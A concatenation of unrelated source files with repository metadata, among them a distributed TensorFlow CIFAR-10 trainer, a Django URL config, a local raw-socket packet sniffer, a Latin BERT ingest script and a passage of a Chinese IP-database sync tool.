3f402389ba3b8f59adf8aa8a4a3ef302e9c08adf | 0ab2cdbef3864c74f455d3911caf6c6acc3223d2 | /tensorflow/cifar/cifar10_dist_train.py | f5fa95048452a59baedcf04c169af14a886c797f | [
"MIT"
] | permissive | lanhin/learn | efc5b66fd40201c0bad5d464166bc1cd2881eaea | 053a26c7c6462725546eb3dc1d09734c66895559 | refs/heads/master | 2021-01-01T04:01:38.119445 | 2017-09-14T09:24:16 | 2017-09-14T09:24:16 | 97,101,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,485 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A binary to train CIFAR-10 using a single GPU.
Accuracy:
cifar10_train.py achieves ~86% accuracy after 100K steps (256 epochs of
data) as judged by cifar10_eval.py.
Speed: With batch_size 128.
System | Step Time (sec/batch) | Accuracy
------------------------------------------------------------------
1 Tesla K20m | 0.35-0.60 | ~86% at 60K steps (5 hours)
1 Tesla K40m | 0.25-0.35 | ~86% at 100K steps (4 hours)
Usage:
Please see the tutorial and website for how to download the CIFAR-10
data set, compile the program and train the model.
http://tensorflow.org/tutorials/deep_cnn/
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import time
import tensorflow as tf
from tensorflow.python.client import timeline
from keras import datasets as dset
import numpy as np
import cifar10
import os
# Command-line flags. NOTE: this is the TF 1.x tf.app.flags wrapper; flag
# values are parsed from sys.argv on first attribute access of FLAGS.
FLAGS = tf.app.flags.FLAGS

tf.app.flags.DEFINE_string('train_dir', '/tmp/cifar10_train',
                           """Directory where to write event logs """
                           """and checkpoint.""")
# 390 batches/epoch (50000 / 128) * 250 epochs -- TODO confirm intent.
tf.app.flags.DEFINE_integer('max_steps', 390*250,
                            """Number of batches to run.""")
tf.app.flags.DEFINE_boolean('log_device_placement', False,
                            """Whether to log device placement.""")
tf.app.flags.DEFINE_integer('log_frequency', 30,
                            """How often to log results to the console.""")

#lanhin
# Distributed-training flags: cluster membership (ps/worker host lists),
# this process's role (job_name) and index within that role (task_index).
tf.app.flags.DEFINE_integer("task_index", None,
                            "Worker task index, should be >= 0. task_index=0 is "
                            "the master worker task the performs the variable "
                            "initialization ")
tf.app.flags.DEFINE_integer("num_gpus", 0,
                            "Total number of gpus for each machine."
                            "If you don't use GPU, please set it to '0'")
tf.app.flags.DEFINE_string("ps_hosts","localhost:2222",
                           "Comma-separated list of hostname:port pairs")
tf.app.flags.DEFINE_string("worker_hosts", "localhost:2223,localhost:2224",
                           "Comma-separated list of hostname:port pairs")
tf.app.flags.DEFINE_string("job_name", None,"job name: worker or ps")
# Tau: staleness bound used by the distributed update scheme
# -- presumably steps between synchronizations; confirm against train().
tf.app.flags.DEFINE_integer("tau", 2, "The Tau value")

# Hide all GPUs from parameter-server processes so they run on CPU only.
# NOTE(review): accessing FLAGS.job_name here forces flag parsing at module
# import time -- verify this is intended relative to tf.app.run().
if FLAGS.job_name == "ps":
  os.environ["CUDA_VISIBLE_DEVICES"]=''
# Commented-out alternative: pin each worker task to a distinct GPU.
#elif FLAGS.task_index == 0:
#  os.environ["CUDA_VISIBLE_DEVICES"]='0'
#else:
#  os.environ["CUDA_VISIBLE_DEVICES"]='1'

# alpha is defined here but not used in the code visible in this file chunk.
alpha = 0.1
# Dataset-derived constants (50000 training examples, 10 classes for CIFAR-10).
EPOCH_SIZE = cifar10.NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN
NUM_LABELS = cifar10.NUM_CLASSES
#lanhin end
def normalize(X_train, X_test):
    """Standardize both image sets using training-set statistics.

    A single scalar mean and standard deviation are computed over the
    entire training set (all four axes: sample, height, width, channel)
    and applied to both the training and test sets, so the test data is
    scaled consistently with what the model saw during training. A small
    epsilon keeps the division safe if the std is zero.

    Args:
        X_train: 4-D array of training images.
        X_test: 4-D array of test images.

    Returns:
        Tuple (X_train, X_test) of the normalized arrays.
    """
    all_axes = (0, 1, 2, 3)
    mu = np.mean(X_train, axis=all_axes)
    sigma = np.std(X_train, axis=all_axes)
    scale = sigma + 1e-7
    return (X_train - mu) / scale, (X_test - mu) / scale
def softmax(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum() # may this can fix the exp() overflow problem. --lanhin
#return np.exp(x) / np.sum(np.exp(x), axis=0)
def predt(sess, x_test, y_test, logits, x, y):
size = x_test.shape[0]
predictions = np.ndarray(shape=(size, NUM_LABELS), dtype=np.float32)
for begin in xrange(0, size, FLAGS.batch_size):
end = begin + FLAGS.batch_size
if end <= size:
predictions[begin:end, :] = sess.run(
logits,
feed_dict={x: x_test[begin:end, ...], y: y_test[begin:end]})
else:
batch_predictions = sess.run(
logits,
feed_dict={x: x_test[-FLAGS.batch_size:, ...], y: y_test[-FLAGS.batch_size:]})
predictions[begin:, :] = batch_predictions[begin - size:, :]
correct = 0
pred = []
for item in predictions:
pred.append(np.argmax(softmax(item)))
for i in range(len(pred)):
# print ("i=", i)
# print ("pred and y_test:", pred[i], y_test[i][0])
if pred[i] == y_test[i]:
correct += 1
acc = (1.0000 * correct / predictions.shape[0])
print ("acc:", acc)
def train():
"""Train CIFAR-10 for a number of steps."""
#lanhin
#Construct the cluster and start the server
ps_spec = FLAGS.ps_hosts.split(",")
worker_spec = FLAGS.worker_hosts.split(",")
# Get the number of workers.
num_workers = len(worker_spec)
cluster = tf.train.ClusterSpec({
"ps": ps_spec,
"worker": worker_spec})
server = tf.train.Server(
cluster, job_name=FLAGS.job_name, task_index=FLAGS.task_index)
if FLAGS.job_name == "ps":
server.join()
# only worker will do train()
is_chief = False
if FLAGS.task_index == 0:
is_chief = True
#lanhin end
#with tf.Graph().as_default():
# Use comment to choose which way of tf.device() you want to use
#with tf.Graph().as_default(), tf.device(tf.train.replica_device_setter(
# worker_device="/job:worker/task:%d" % FLAGS.task_index,
# cluster=cluster)):
with tf.device("job:worker/task:%d" % FLAGS.task_index):
global_step = tf.contrib.framework.get_or_create_global_step()
# Get images and labels for CIFAR-10.
# Force input pipeline to CPU:0 to avoid operations sometimes ending up on
# GPU and resulting in a slow down.
#with tf.device('/cpu:0'):
images, labels = cifar10.distorted_inputs()
(x_train, y_train_orl), (x_test, y_test_orl) = dset.cifar10.load_data()
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train, x_test = normalize(x_train, x_test)
y_train_orl = y_train_orl.astype('int32')
y_test_orl = y_test_orl.astype('int32')
y_train_flt = y_train_orl.ravel()
y_test_flt = y_test_orl.ravel()
x = tf.placeholder(tf.float32, shape=(FLAGS.batch_size, 32,32,3))
y = tf.placeholder(tf.int32, shape=(FLAGS.batch_size,))
# Build a Graph that computes the logits predictions from the
# inference model.
#logits, local_var_list = cifar10.inference(images)
logits, local_var_list = cifar10.inference(x)
# Calculate loss.
#loss = cifar10.loss(logits, labels)
loss = cifar10.loss(logits, y)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
# the temp var part, for performance testing
tmp_var_list = []
var_index = 0
for var in local_var_list:
var_index += 1
tmp_var_list.append(tf.Variable(tf.zeros(var.shape), name="tmp_var"+str(var_index)))
# the non chief workers get local var init_op here
if not is_chief:
init_op = tf.global_variables_initializer()
else:
init_op = None
# start global variables region
global_var_list = []
with tf.device("/job:ps/replica:0/task:0/cpu:0"):
# barrier var
finished = tf.get_variable("worker_finished",[],tf.int32,tf.zeros_initializer(tf.int32),trainable=False)
with finished.graph.colocate_with(finished):
finish_op = finished.assign_add(1,use_locking=True)
var_index = 0
for var in local_var_list:
var_index += 1
global_var_list.append(tf.Variable(tf.zeros(var.shape), name="glo_var"+str(var_index)))
def assign_global_vars(): # assign local vars' values to global vars
return [gvar.assign(lvar) for (gvar, lvar) in zip(global_var_list, local_var_list)]
def assign_local_vars(): # assign global vars' values to local vars
return [lvar.assign(gvar) for (gvar, lvar) in zip(global_var_list, local_var_list)]
def assign_tmp_vars(): # assign local vars' values to tmp vars
return [tvar.assign(lvar) for (tvar, lvar) in zip(tmp_var_list, local_var_list)]
def assign_local_vars_from_tmp(): # assign tmp vars' values to local vars
return [lvar.assign(tvar) for (tvar, lvar) in zip(tmp_var_list, local_var_list)]
def update_before_train(alpha, w, global_w):
varib = alpha*(w-global_w)
gvar_op = global_w.assign(global_w + varib)
return gvar_op, varib
def update_after_train(w, vab):
return w.assign(w-vab)
assign_list_local = assign_local_vars()
assign_list_global = assign_global_vars()
assign_list_loc2tmp = assign_tmp_vars()
assign_list_tmp2loc = assign_local_vars_from_tmp()
before_op_tuple_list = []
after_op_tuple_list = []
vbholder_list = []
for (gvar, lvar) in zip(global_var_list, local_var_list):
before_op_tuple_list.append((update_before_train(alpha, lvar, gvar)))
for var in local_var_list:
vbholder_list.append(tf.placeholder("float", var.shape))
after_op_tuple_list.append((update_after_train(var, vbholder_list[-1]), vbholder_list[-1]))
# the chief worker get global var init op here
if is_chief:
init_op = tf.global_variables_initializer()
# global variables region end
#lanhin start
sv = tf.train.Supervisor(
is_chief=True,#is_chief,
logdir=FLAGS.train_dir,
init_op=init_op,
#local_init_op=loc_init_op,
recovery_wait_secs=1)
#global_step=global_step)
sess_config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=FLAGS.log_device_placement,
device_filters=["/job:ps", "/job:worker/task:%d" % FLAGS.task_index])
# The chief worker (task_index==0) session will prepare the session,
# while the remaining workers will wait for the preparation to complete.
if is_chief:
print("Worker %d: Initializing session..." % FLAGS.task_index)
else:
print("Worker %d: Waiting for session to be initialized..." %
FLAGS.task_index)
sess = sv.prepare_or_wait_for_session(server.target, config=sess_config)
if is_chief:
sess.run(assign_list_global)
barrier_finished = sess.run(finish_op)
print ("barrier_finished:", barrier_finished)
else:
barrier_finished = sess.run(finish_op)
print ("barrier_finished:", barrier_finished)
while barrier_finished < num_workers:
time.sleep(1)
barrier_finished = sess.run(finished)
sess.run(assign_list_local)
print("Worker %d: Session initialization complete." % FLAGS.task_index)
# lanhin end
#sess = tf.Session()
#sess.run(init_op)
#tf.train.start_queue_runners(sess)
f = open('tl_dist.json', 'w')
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
time_begin = time.time()
# while not mon_sess.should_stop():
# mon_sess.run(train_op)
for step in range(FLAGS.max_steps):
offset = (step * FLAGS.batch_size) % (EPOCH_SIZE - FLAGS.batch_size)
x_data = x_train[offset:(offset + FLAGS.batch_size), ...]
y_data_flt = y_train_flt[offset:(offset + FLAGS.batch_size)]
if step % FLAGS.log_frequency == 0:
time_step = time.time()
steps_time = time_step - time_begin
print ("step:", step, " steps time:", steps_time, end=' ')
sess.run(assign_list_loc2tmp)
sess.run(assign_list_local)
predt(sess, x_test, y_test_flt, logits, x, y)
sess.run(assign_list_tmp2loc)
time_begin = time.time()
if step % FLAGS.tau == 0 and step > 0: # update global weights
thevarib_list = []
for i in range(0, len(before_op_tuple_list)):
(gvar_op, varib) = before_op_tuple_list[i]
_, thevarib = sess.run([gvar_op, varib])
thevarib_list.append(thevarib)
sess.run(train_op, feed_dict={x:x_data, y:y_data_flt})
for i in range(0, len(after_op_tuple_list)):
(lvar_op, thevaribHolder) = after_op_tuple_list[i]
sess.run(lvar_op, feed_dict={thevaribHolder: thevarib_list[i]})
else:
sess.run(train_op, feed_dict={x:x_data, y:y_data_flt})#, options=run_options, run_metadata=run_metadata)
#tl = timeline.Timeline(run_metadata.step_stats)
#ctf = tl.generate_chrome_trace_format()
#f.write(ctf)
time_end = time.time()
training_time = time_end - time_begin
print("Training elapsed time: %f s" % training_time)
f.close()
sess.run(assign_list_local)
predt(sess, x_test, y_test_flt, logits, x, y)
def main(argv=None): # pylint: disable=unused-argument
cifar10.maybe_download_and_extract()
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
| [
"lanhin1@gmail.com"
] | lanhin1@gmail.com |
151c76c81dfa1c2b7f7c3c7aae40575f32036853 | 6f4c3966317577488aad949dce8c57f18b55df3a | /spec/metrics/src/counter.py | 38f8385dbc8b6138b7a07ac980bb2c98d8b12651 | [
"Apache-2.0"
] | permissive | tikal-fuseday/python-microprofile | 1f78c72ced27a03670b7d1c3408895ecdeaf4b59 | 3700db5ca0be6a31df7d8aac8a523f9199484e76 | refs/heads/master | 2023-05-13T12:30:29.493762 | 2020-02-23T15:40:11 | 2020-02-23T15:40:11 | 240,019,270 | 10 | 1 | Apache-2.0 | 2023-05-01T21:20:50 | 2020-02-12T13:26:44 | Python | UTF-8 | Python | false | false | 297 | py | from spec.metrics.src.metric import Metric
class Counter(Metric):
def __init__(self, *args, **kwargs):
super(Counter, self).__init__(*args, **kwargs)
self._counter = 0
def inc(self, n=1):
self._counter += n
def get_count(self):
return self._counter
| [
"nir@myhippo.com"
] | nir@myhippo.com |
fc4030697b74d0346388831c2bebbd1f2b35f932 | c7ad12038ca73d999e3f99e090e9233a435c0156 | /Project.py | 2a31b769adfb69357fe0e6f2519a869b44d2284e | [
"MIT"
] | permissive | Akohlert/Anders | c0a022e98d71194502f33c5182b5f44f8f9cebae | 1bbfbd9bd1c13caf2dfcf22685c3587896072956 | refs/heads/master | 2020-04-28T18:30:21.954185 | 2019-04-02T12:40:46 | 2019-04-02T12:40:46 | 175,480,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | {
"folders": [
{
"path": "C:\\Users\\ander\\Desktop\\Microsoft VS Code"
},
{
"name": "Anders-1",
"path": "C:\\Users\\ander\\OneDrive\\Polit\\Python\\Anders-1"
}
],
"settings": {}
} | [
"jqs310@alumni.ku.dk"
] | jqs310@alumni.ku.dk |
a585065a3adc8bc699bf8ba1c78b67358d1ea23c | c99c272181eb43df688cc6af10bfb17659014ab9 | /03_ОOP-Python/01-Defining Classes/02_Exercise/07_GuildSystem/project/venv/Scripts/easy_install-script.py | 479119ad1bbdbfaf2e56c4f7f55eb619444da6c2 | [] | no_license | LachezarKostov/SoftUni | ce89d11a4796c10c8975dc5c090edecac993cb03 | 47559e9f01f7aabd73d84aa175be37140e2d5621 | refs/heads/master | 2023-01-29T20:49:57.196136 | 2020-12-10T12:34:09 | 2020-12-10T12:34:09 | 283,491,508 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | #!"C:\Users\dream\Desktop\Python\OP-Python\01-Defining Classes\02_Exercise\07_GuildSystem\project\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"68952160+LachezarKostov@users.noreply.github.com"
] | 68952160+LachezarKostov@users.noreply.github.com |
d1ebae2ff87d5d64981c34e8feeae8da2eea7ed8 | 0606f10b1592a1b6c07f074834f9d9edc942cdb2 | /eventus2/urls.py | d8ff6ba71db37b144c52f920f20e0e82c3ef1e2a | [] | no_license | anderson383/Projecto-Curso-de-eventos-django | 4f27ccde5039aaec9f6ba6c002bc3a1ee715934f | b4d71a4dbe7a27cb66f238a255f03842d609459f | refs/heads/master | 2020-12-15T04:51:47.972117 | 2020-01-20T01:57:49 | 2020-01-20T01:57:49 | 234,999,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 844 | py | """eventus2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path("", include("apps.events.urls")),
path("", include("apps.users.urls")),
path('admin/', admin.site.urls),
]
| [
"andersonvargas@gmail.com"
] | andersonvargas@gmail.com |
ee4500bd527888108aa19986070fb4c9cbd8d6a6 | e5c353d9ca1cd39e0bfabc79e064a36187d7ccff | /virtnic.py | 5797f70e692dc15df6698a99d1b02359d8a2c955 | [] | no_license | sir-ragna/packetsniffer | 91f88c0d01c23c39007d9db5da0911bbe1e361cd | cf2ec741a617789f9b72234937d86832942575b4 | refs/heads/master | 2021-01-22T09:58:20.729807 | 2015-09-06T20:41:51 | 2015-09-06T20:41:51 | 35,232,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,377 | py | __author__ = 'Robbe Van der Gucht'
from random import choice
import socket
import sys
import logging
import internet
from data import init_datastore, save_packet
import atexit
# Set up logger
log_file = 'virtnic.log'
logging.basicConfig(filename=log_file,
level=logging.DEBUG,
format='%(levelname)s:%(asctime)s:%(message)s')
logger = logging.getLogger(__name__)
@atexit.register
def check_logs():
print("\nCheck log file %s for errors" % log_file)
class NetworkInterface:
def get_mac_bytes(self):
return b''.join([s.decode('hex') for s in self.mac_address.split(':')])
def get_mac_str(self):
return self.mac_address
def __init__(self, mac_address=None):
if mac_address is None:
self.mac_address = ''.join([choice(list("0123456789ABCDEF")) if a == 'X' else a for a in list("XX:XX:XX:XX:XX:XX")])
else:
self.mac_address = mac_address
def start_listening(self, datastore_file='packets.dat'):
"""Listen for incoming traffic"""
try:
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
# socket.ntohs converts bytes from little endian(intel) to big endian(network)
init_datastore(datastore_file)
except socket.error, msg:
logging.critical("Socket could not be created. Error Code: %s Message: %s", str(msg[0]), str(msg[1]))
sys.exit(1)
try:
while 1:
unit = s.recvfrom(65565)[0]
# ^
# 65,535 <= max length of IPv4 packet
# + ethernet frame header
logging.debug("TOTAL ETHERNET FRAME LENGTH: %d", len(unit))
try:
ethframe = internet.EthernetFrame(unit)
save_packet(ethframe, datastore_file)
except internet.Unimplemented as err:
logging.warning(err.msg)
except internet.ErrorInvalidDatagram as err:
logging.error(err.msg)
print(str(ethframe))
except KeyboardInterrupt:
logging.info("Keyboard interrupt received")
try:
s.close()
except socket.error:
logging.warning("Closing socket failed")
logging.info("Stopping program")
def __str__(self):
s = "Network Interface\n"
s += "Hardware address: %s" % self.mac_address
return s
vnic = NetworkInterface()
vnic.start_listening() | [
"robbe.vandergucht@gmail.com"
] | robbe.vandergucht@gmail.com |
1e432e96dd1aaeb5d8842e0cb6caf89568d4ed58 | f4550e1553011d8a04ab484ec48472341141557f | /pycircuit/circuit/examples/mos_cir_with_caps.py | cf632bfffb1504cefb701d70da18ea8adf76c296 | [] | no_license | henjo/pycircuit | 6c9159f32bac19a3a7e93dc798a471fe283c4f70 | 20eb79fd05bd7903f7033b41ad8a1b106e99d9e3 | refs/heads/master | 2023-07-11T23:44:53.390939 | 2019-08-23T06:30:53 | 2019-08-23T06:30:53 | 79,107 | 32 | 15 | null | 2012-10-06T15:51:54 | 2008-11-21T14:31:45 | Python | UTF-8 | Python | false | false | 900 | py | #This code finds the gain of a CS stage, now considering the intrinsic MOS capacitantes. The results is the same as in the book Design Analog CMOS Integrated Circuits, by Behzad Razavi - pg 174.
from sympy import *
from pycircuit.circuit import *
from pycircuit.circuit import mos
c=SubCircuit(toolkit=symbolic)
inp=c.add_node('inp')
inp1=c.add_node('inp1')
out=c.add_node('out')
vdd=c.add_node('vdd')
var('R_L,R_S,gm1,gmb1,ro1,Cgs1,Cgd1,Cdb1,s')
c['VDD']=VS(vdd,gnd,v=5,vac=0)
c['R_L']=R(vdd,out,r=R_L)
c['R_S']=R(inp,inp1,r=R_S)
c['Vin']=VS(inp,gnd,v=1,vac=1)
c['M1']=mos.MOS(inp1,out,gnd,gnd,gm=gm1,gds=0,gmb=0,Cgs=Cgs1,Cgd=Cgd1,Cdb=Cdb1,toolkit=symbolic)
ac=AC(c)
res=ac.solve(s,complexfreq=True)
gain=simplify(res.v('out')/res.v('inp'))
print "\nThe transfer function of the CS stage is:"
sympy.pprint(gain)
print "\nShowing the denominator as polynomial:"
sympy.pprint(denom(gain).as_poly(s))
| [
"taimurgibran@gmail.com"
] | taimurgibran@gmail.com |
55814cb8008d618e84f59cc9762bb4f0cc9db4a6 | 422d74fb18cd1104b659f64ff800b1577b3f5b6e | /ingest.py | c036437b906b4b2fe7101b350359d57303a765fd | [
"Apache-2.0"
] | permissive | nOkuda/bert-experiments | 60be7a23b81156a4f4c573789c56da3c77efdb27 | 596928c682d678243bcf80a7ce348066b4ea5f2f | refs/heads/main | 2023-08-02T20:15:45.136476 | 2021-09-21T23:35:41 | 2021-09-21T23:35:41 | 408,950,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 915 | py | import time
from pathlib import Path
from lasearch.db import FlatFileDatabase
from lasearch.latinbert import LatinBERT
def _main():
bert_model = LatinBERT(
tokenizerPath=
'latin-bert/models/subword_tokenizer_latin/latin.subword.encoder',
bertPath='latin-bert/models/latin_bert')
db = FlatFileDatabase(db_dir=Path('flatdb'))
latin_tess_files_dir = Path('data')
aeneid_path = latin_tess_files_dir / 'vergil.aeneid.tess'
lucan1_path = latin_tess_files_dir / 'lucan.bellum_civile.part.1.tess'
_timed_ingest(db, aeneid_path, bert_model, 'Aeneid ingest time:')
_timed_ingest(db, lucan1_path, bert_model, 'Lucan 1 ingest times:')
def _timed_ingest(db, tessfile_path, bert_model, message):
start = time.time()
db.ingest(tessfile_path, bert_model)
ingest_time = time.time() - start
print(message, ingest_time)
if __name__ == '__main__':
_main()
| [
"Nozomu.Okuda@gmail.com"
] | Nozomu.Okuda@gmail.com |
a69ceceda28fd5ed8c05c28ec9f3daf2a56da56b | 0c62fdc906585b121e7b2a43341cdcb8db75e9d5 | /pinax_theme_bootstrap/__init__.py | 5dc043e0d01aef149dda7a8d34124a78a1fd9cf0 | [] | no_license | Magnatelabs/Magnate-Application | c4b0eb97b64db848af250766a518257780cdfdb7 | b80a076ad2e0e77edad04ea15d63fa673ec83078 | refs/heads/master | 2021-03-27T09:27:04.740953 | 2015-03-13T15:26:35 | 2015-03-13T15:26:35 | 12,013,196 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 22 | py | __version__ = "3.0a9"
| [
"jolumwilliams@gmail.com"
] | jolumwilliams@gmail.com |
085d5c0515c864914b616949c2a075f8d94e18cb | c1adccd2dfdc2407ffc1eb729c817f0a09c32575 | /bathroomapp/admin.py | b1ab1e066e153472bc4f891b7243f193b9c52eae | [] | no_license | elmwoodtim/cbs-centralbathroomsolution | a7e6131b3f36bfeb0985d02fea8744e1acb083fa | e68f765a9ff9d9a22e58fe01069711825055a54c | refs/heads/master | 2022-12-10T23:56:08.197281 | 2020-01-25T19:01:24 | 2020-01-25T19:01:24 | 235,666,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 212 | py | from django.contrib import admin
from bathroomapp.models import AppUser, Packages, Bathroom
# Register your models here.
admin.site.register(AppUser)
admin.site.register(Packages)
admin.site.register(Bathroom)
| [
"timlim@Tims-MacBook-Air.local"
] | timlim@Tims-MacBook-Air.local |
2b888880982db9b582df2d6ba9d04acf17ecbc83 | f9c9494b229218c9d6748f69ee5a685aa47642e3 | /py1/0330/0330-2.py | 1a39cf0458e7711647354fe16a19d0c7680c13e5 | [] | no_license | leleluv1122/Python | 5993db39cdaa773378d735c0db8df42372b8df09 | b2b46931baad7ce5da7a7816354a0cf3ffa3acc7 | refs/heads/master | 2021-03-26T09:41:38.174962 | 2020-06-28T05:51:31 | 2020-06-28T05:51:31 | 247,693,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | import math
x1, y1, x2, y2, x3, y3 = eval(input("Enter six coordinates of three points "
"separated by commas like x1, y1, x2, y2, x3, y3: "))
# 각 변의 길이 구하고,
a = math.sqrt((x2 - x3) * (x2 - x3) + (y2 - y3) * (y2 - y3))
b = math.sqrt((x1 - x3) * (x1 - x3) + (y1 - y3) * (y1 - y3))
c = math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2))
# acos로 각도를 구하고(radian) 이걸 math.degrees로 바꿔준다
A = math.degrees(math.acos((a*a-b*b-c*c) / (-2*b*c)))
B = math.degrees(math.acos((b*b-a*a-c*c) / (-2*a*c)))
C = math.degrees(math.acos((c*c-b*b-a*a) / (-2*a*b)))
# 소숫점 2번째 자리까지 구하려고 ...
print("The three angles are ", round(A * 100) / 100.0,
round(B * 100) / 100.0, round(C*100) / 100.0) | [
"jh_o214@naver.com"
] | jh_o214@naver.com |
8e8e39e2fc6905770a6ab02ad717fa151d1404f6 | 820c31e0ad953e71d19a3062ff68606e234ba647 | /IP_Sync/ip_Sync.py | 6db96460082f779fae6d2f66c946e03d63d82e58 | [
"MIT"
] | permissive | wemecan/czipdata | ce15e63509874f3f89414c079774fe94c4bc335d | ee382832cf8506cc473e4a4cc9ece24abc9d99a1 | refs/heads/main | 2023-01-24T08:09:30.985568 | 2020-11-24T03:48:37 | 2020-11-24T03:48:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,382 | py | # -*- encoding: utf-8 -*-
'''
@Description: :实现纯真IP数据库的下载和更新.
@Date :2020/11/03 13:27:05
@Author :a76yyyy
@version :1.0
'''
import sys,os
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
sys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))
import ipUpdate
import dat2txt
from database import mysql_Database
from configs import config,default_dat_update
from dat2mysql import dat2mysql
from collegeUpdate import collegeUpdate
from convert import convert
from file_set import file_set
tmp_dir = os.path.abspath(os.path.dirname(__file__)+os.path.sep+"tmp")
file_set(tmp_dir,'dir')
data_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__))+os.path.sep+"data")
file_set(data_dir,'dir')
def down(filename= None):
"""
@description :从纯真网络(cz88.net)导入qqwry.dat至指定dat格式文件名.
---------
@param :filename : 输出纯真IP数据库的dat文件名或路径,默认为"../data/czipdata.dat".
-------
@Returns :None
-------
"""
varlist = []
if filename == None:
filename = os.path.abspath(data_dir+os.path.sep+"czipdata.dat")
file_set(filename)
version_file = os.path.abspath(data_dir+os.path.sep+"czipdata_version.bin")
file_set(version_file)
ret = ipUpdate.datdown(filename,version_file)
if ret > 0:
print('成功写入到%s, %s字节' %
(filename, format(ret, ','))
)
print( "------------------------------------------- \n " )
elif ret == 0:
print( "------------------------------------------- \n " )
else:
print('写入失败, 错误代码: %d' % ret)
print( "------------------------------------------- \n " )
def dat2Txt(dat_filename= None, txt_filename= None, startIndex= None, endIndex= None):
"""
@description :将纯真IP数据库的dat文件转换为txt文本文件
---------
@params :dat_filename : 纯真IP数据库的dat文件名或路径,默认为"../data/czipdata.dat"
txt_filename : 输出文本文件的文件名或路径,默认为"../data/czipdata.txt"
startIndex : 起始索引, 默认为0
endIndex : 结束索引, 默认为IP数据库总记录数
-------
@Returns :None
-------
"""
if dat_filename == None:
dat_filename = os.path.abspath(data_dir+os.path.sep+"czipdata.dat")
if not file_set(dat_filename) or default_dat_update:
down(dat_filename)
q = dat2txt.IPLoader(dat_filename)
if txt_filename == None:
txt_filename = os.path.abspath(data_dir+os.path.sep+"czipdata.txt")
file_set(txt_filename)
if startIndex == None:
startIndex = 0
if endIndex == None:
endIndex = q.idx_count
ip_info = q.get_ip_info(txt_filename,startIndex,endIndex)
def dat2Mysql(mysql_object,ip_tablename= None, txt_filename= None):
"""
@description :将纯真IP数据库的txt文件转换至mysql数据库指定表中
---------
@params :ip_tablename : mySQL中IP数据库的表名,默认为"iprange_info"
txt_filename : 输入文本文件的文件名或路径,默认为"../data/czipdata.txt"
-------
@Returns :None
-------
"""
if txt_filename == None:
txt_filename = os.path.abspath(data_dir+os.path.sep+"czipdata.txt")
if not file_set(txt_filename):
dat2Txt(txt_filename= txt_filename)
if ip_tablename == None:
ip_tablename = 'iprange_info'
mysql = mysql_object
dat2mysql(mysql,ip_tablename,txt_filename)
def collegeupdate(collegeJson= None, college_tablename= None):
"""
@description :从'https://github.com/pg7go/The-Location-Data-of-Schools-in-China'导入'大学-8084.json'至指定json格式文件名.
---------
@param :collegeJson : 输出大学数据的json文件名或路径,默认为"./tmp/college.json".
college_tablename : mySQL中IP数据库的大学信息表的表名,默认为"college_info"
-------
@Returns :None
-------
"""
if collegeJson == None:
collegeJson = os.path.abspath(tmp_dir+os.path.sep+"college.json")
if college_tablename == None:
college_tablename = 'college_info'
collegeUpdate(filename, college_tablename)
def convertipv4(mysql_object,college_tablename= None,num_config= None,start_id= None,college_filename= None,correct_filename= None):
"""
@description :将纯真IP数据库内的地址细分为省市区
---------
@params :num_config : 每次处理ip信息的记录数, 默认为20000.
start_id : 处理ip信息的起始记录索引值, 默认为1.
college_tablename : mySQL中IP数据库的大学信息表的表名,默认为"college_info".
college_filename : 输出大学数据的json文件名或路径,默认为"./tmp/college.json".
correct_filename : 自定义纠错文件的json文件名或路径,默认为"../data/correct.json".
-------
@Returns :None
-------
"""
if num_config == None:
num_config = 20000
if start_id == None:
start_id = 1
if college_tablename == None:
college_tablename = 'college_info'
